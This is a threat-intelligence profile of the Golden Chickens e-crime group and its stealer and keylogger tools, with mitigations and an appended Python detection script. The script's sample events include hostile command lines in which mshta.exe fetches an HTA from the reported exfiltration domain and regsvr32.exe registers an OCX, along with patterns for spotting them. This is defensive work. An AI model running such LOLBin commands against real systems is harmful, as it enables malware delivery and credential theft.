Full Report
The threat actors known as Golden Chickens have been attributed to two new malware families dubbed TerraStealerV2 and TerraLogger, suggesting continued development efforts to fine-tune and diversify their arsenal. "TerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information," Recorded Future Insikt Group said. "TerraLogger, by contrast
Analysis Summary
# Threat Actor: Golden Chickens
## Attribution & Identity
**Name/Alias:** Golden Chickens
**Known Aliases:** Venom Spider
**Associated Groups:** Historically linked to the More_eggs malware family, offered under a Malware-as-a-Service (MaaS) model.
**Attribution Notes:** Active since at least 2018. Attributed in 2023 to an online persona known as `badbullzvenom`, believed to be operated jointly by individuals from Canada and Romania.
## Activity Summary
Golden Chickens continues to develop and diversify its malware arsenal, as demonstrated by the release of two new families: TerraStealerV2 and TerraLogger. The group is known for its MaaS operations. Recent activity has also included the use of a backdoor called RevC2 and a loader named Venom Loader, often delivered via VenomLNK. The development of TerraStealerV2 suggests an ongoing focus on credential theft, though its current version appears not to account for Chrome's recent Application Bound Encryption (ABE) protection.
## Tactics, Techniques & Procedures
- **Data Stealing:** TerraStealerV2 is designed to collect browser credentials (targeting Chrome's 'Login Data' database), cryptocurrency wallet data, and browser extension information.
- **Keylogging:** TerraLogger functions as a standalone keylogger built on a common low-level keyboard hook.
- **File Execution/Delivery:** Payloads are delivered as executable files (EXE), dynamic-link libraries (DLL), Windows Installer packages (MSI), and shortcut (LNK) files.
- **Defense Evasion:** Abuse of trusted Windows utilities such as `regsvr32.exe` and `mshta.exe` to execute payloads while evading detection.
- **Initial Access/Delivery Mechanism:** Use of VenomLNK to deliver payloads like RevC2 and Venom Loader.
## Targeting
**Sectors:** Generalized financial motivation suggests targeting sectors where sensitive credentials or financial data are prevalent.
**Geography:** Not explicitly detailed in the context of recent campaigns, but the alleged operators have ties to Canada and Romania.
**Victims:** Specific organizations are not detailed, but objectives focus on credentials and wallet data.
## Tools & Infrastructure
**Malware Families Used:**
* TerraStealerV2 (New stealer)
* TerraLogger (New keylogger)
* More_eggs (Notorious base family)
* More_eggs lite (aka lite_more_eggs)
* VenomLNK
* TerraLoader
* TerraCrypt
* RevC2 (Backdoor)
* Venom Loader
**Infrastructure:**
* **Exfiltration Domain:** `wetransfers[.]io` (used for data exfiltration and OCX payload retrieval)
* **Exfiltration Channel:** Telegram
* **Delivery Format:** Payloads are delivered as OCX files retrieved from external infrastructure.
## Implications
Golden Chickens remains a persistent and adaptive e-crime operation driven by financial motives, operating extensively via a MaaS model. The continuous development of new but slightly unrefined tools indicates active research and development cycles, suggesting that TerraStealerV2 and TerraLogger will likely mature into more stealthy and effective modules for credential harvesting and espionage in the near future.
## Mitigations
- Implement robust endpoint detection and response (EDR) to monitor for the execution of trusted Windows utilities (`regsvr32.exe`, `mshta.exe`) for suspicious purposes.
- Scrutinize email and other distribution vectors for delivery of unusual file types such as LNK, MSI, and OCX, and alert on execution attempts involving them.
- Ensure Chrome browsers are kept up to date to benefit from newer protections such as Application Bound Encryption (ABE) against credential theft targeting locally stored credential databases.
- Monitor for suspicious network traffic to Telegram endpoints or to unknown external domains that may indicate data exfiltration.
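As an added detection example (not part of the original report), the following Python scans constructed Sysmon-style process and network events for the behaviours listed above: `regsvr32.exe` registering an OCX from a user-writable path, `mshta.exe` given a remote URL, and connections from non-browser processes to the reported domain or to the Telegram Bot API host. The host `api.telegram.org` and the sample events are assumptions; the report itself names only "Telegram" as the channel.

```python
import re

# Indicator from the report, kept defanged as published; refanged below for matching.
REPORTED_DOMAINS = {"wetransfers[.]io"}
# Assumption: Telegram Bot API host; the report names only "Telegram" as the channel.
TELEGRAM_API = "api.telegram.org"
LOLBINS = {"regsvr32.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
URL_RE = re.compile(r"https?://([\w.-]+)", re.I)
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Windows\\Temp)\\", re.I)
BAD_HOSTS = {d.replace("[.]", ".").lower() for d in REPORTED_DOMAINS}

# Constructed sample telemetry (Sysmon-style process-creation and network events), not real logs.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe", "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\update.ocx"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe", "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://wetransfers.io/invoice.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
    {"type": "network", "image": r"C:\Windows\System32\regsvr32.exe", "dest_host": "wetransfers.io"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_host": "api.telegram.org"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe", "dest_host": "api.telegram.org"},
]

def classify(ev):
    """Return the list of reasons an event is suspicious; an empty list means no finding."""
    reasons = []
    binary = ev["image"].rsplit("\\", 1)[-1].lower()
    # Process events: a trusted utility handed a URL, or regsvr32 loading an OCX from a user-writable path.
    if ev["type"] == "process" and binary in LOLBINS:
        cmd = ev["cmdline"]
        hosts = [h.lower() for h in URL_RE.findall(cmd)]
        if hosts:
            reasons.append(f"{binary} given remote URL")
        if binary == "regsvr32.exe" and re.search(r"\.ocx\b", cmd, re.I) and USER_WRITABLE.search(cmd):
            reasons.append("regsvr32.exe registering OCX from user-writable path")
        reasons += [f"command line references reported domain {h}" for h in hosts if h in BAD_HOSTS]
    # Network events: contact with the reported domain, Telegram API from a non-browser, or any egress by a LOLBin.
    elif ev["type"] == "network":
        host = ev["dest_host"].lower()
        if host in BAD_HOSTS:
            reasons.append(f"{binary} connected to reported domain {host}")
        elif host == TELEGRAM_API and binary not in BROWSERS:
            reasons.append(f"non-browser process {binary} contacting Telegram API")
        elif binary in LOLBINS:
            reasons.append(f"{binary} made outbound connection to {host}")
    return reasons

def scan(events):
    """Return (image, reasons) for every event that triggers at least one finding."""
    return [(ev["image"], r) for ev in events if (r := classify(ev))]
```

Running `scan(SAMPLE_EVENTS)` flags four of the seven constructed events; the benign OCX under Program Files, the local HTA, and the browser's own Telegram traffic produce no finding.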